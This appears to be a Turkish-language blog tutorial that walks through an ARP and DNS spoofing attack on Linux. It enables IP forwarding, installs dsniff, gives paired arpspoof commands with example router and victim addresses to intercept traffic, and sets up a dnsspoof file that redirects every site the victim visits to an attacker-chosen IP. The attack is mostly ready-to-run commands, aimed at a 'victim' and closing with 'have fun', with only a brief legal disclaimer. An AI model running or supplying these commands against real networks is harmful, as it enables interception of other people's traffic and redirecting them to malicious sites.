Arp-Dns Spoof

Selam dostlarım

Bu yazımda sizlere linux altında Arp-Dns spoof yapmayı en basit şekli ile gereksiz ayrıntıla girmeyerek elimden geldiğince anlatmaya çalışacam hadi başlıyalım

Basit olarak Arp spoof ile cihazların Arp tablolarını zehirleyerek iki cihaz arasında kendimizi köprü haline getiriyoruz Dns spoof'un da pek farklı bi yanı yok ikici cihaz arası köprü olduktan sonra gitmek istedikleri siteleri kendi istediğimiz ip adresilerine yönlendiriyoruz.
bu işlemlerin tamamı root yetkileri istemekte kali kullanıyorsanız free takılın sorun yok farklı bir linux dağıtımı kullanıyorsanız komutların başına sudo eklemeniz gerekmekte

hadi başlayalım

herşeyden önce cihazımızın yönlendirme yapmasına izin vermemiz gerekli bir terminal açıp nano ile gerekli dosyayı açarak içerisinde ki 0 değerini 1 yapalım ben nano kullanıcam isterseniz vi-vim veya farklı bir editör de kullanabilirsiniz echo kullanarak da yapabilirsiniz zevk meselesi ☺

nano /proc/sys/net/ipv4/ip_forward

 artık arp spoof yapmaya hazırız fakat uyarmakta fayda var sisteminizde Arp spoof ve Dns spoof için gerekli araçlar kurulu değilse

Debian tabanlı dağıtımlar için

apt install dsniff

Arch tabanlı dağıtımlar için

pacman -S dsniff

komutları ile kurulum yapabilirsiniz

Not : Türkiye de geliştirilen Arch tabanlı gayet performanslı kullanışlı ve şık yerli dağıtımımız Archman kullanmanızı tavsiye ederim.

kurulumları yaptığımıza göre fazla uzatmadan başlayalım

öncelikle Arpspoof yapmamız gerekli

Arp Spoof

iki farklı terminal açmanız gerekli

ilk terminal de

arpspoof -i ag_arayuzu -t modem_ip hedef_ip

komutunu diğer terminale ise

arpspoof -i ag_arayuzu -t hedef_ip modem_ip 

komutlarını verelim modem ip adresini 192.168.1.1 hedef ip adresini de 192.168.1.100 ve ağ arayüzünü wlan0 olarak kabul edersek komutlar şu şekilde olur

arpspoof -i wlan0 -t 192.168.1.1 192.168.1.100
arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1

artık kurbana gidip gelen tüm ağı kendi üzerimize aldık

sıra Dns spoof da

şu anda tüm ağ bizim üzerimizden geçtiği için istersek wireshark ile ağı izleyebiliriz ama konumuz bu değil ☺

Dns Spoof

Dns spoof işlemi için öncelikle nano ile bir dosya açalım

nano dosy_adi.dns

 içerisine

192.168.1.120 *

yazalım artık giriği tüm siteleri 192.168.1.120 ip adresine yönlendirecektir.

sol tarafta yönlendirilecek ip adresini giriyoruz sağ tarafta ise kurbanın girdiği sitelerin ip adresleri biz * karakteri ile girdiği tüm siteleri 192.168.1.120 adresine yönlendirecez.

Arp spoof ile tüm ağı üzerimize almıştık dns için gerekli dosyamızı da hazırladığımıza göre sihirli komutu girelim

dnsspoof -i ag_arayuzu -f dosya_adi.dns

 burdaki ağ arayüzü sizin ağınızın arayüzü olacak ifconfig komutu ile öğrenebilirsiniz

arayüzümüzün wlan0 olduğunu kabul edersek komut şu şekilde olacak

dnsspoof -i wlan0 -f dosya_adi.dns

artık tüm ağ bizim üzerimizden geçiyor ve kurbanın girdiği tüm siteleri 192.168.1.120 adresine yönlendiriyoruz unutmayın bu işlemler izinsiz uygulandığında yasadışıdır ve herhangi bir sorumluluk kabul etmemekteyiz.

iyi eğlenceler ☺

Not : Arp-Dns spoof işlemi sadece http sitelerde uygulanabilmekte https sitelerde işe yaramamaktadır.